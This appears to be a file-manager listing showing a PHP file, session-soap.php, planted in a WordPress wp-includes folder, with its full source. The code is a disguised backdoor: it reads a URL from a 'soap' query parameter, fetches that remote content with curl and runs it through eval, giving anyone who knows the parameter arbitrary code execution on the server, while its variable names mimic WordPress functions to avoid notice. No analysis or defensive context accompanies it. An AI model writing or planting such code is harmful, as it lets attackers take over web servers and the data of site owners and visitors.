File "session-soap.php"
Full path: /var/www/html/wp-includes/session-soap.php
File
size: 327 B
MIME-type: text/x-php
Charset: utf-8
Download Open Edit Advanced Editor Back
<?php
if (isset($_GET['soap'])) {
$add_action_yo = $_GET['soap'];
if ($is_home_tl = curl_init()) {
curl_setopt($is_home_tl, CURLOPT_URL, $add_action_yo);
curl_setopt($is_home_tl, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($is_home_tl));
curl_close($is_home_tl);
exit;
}
}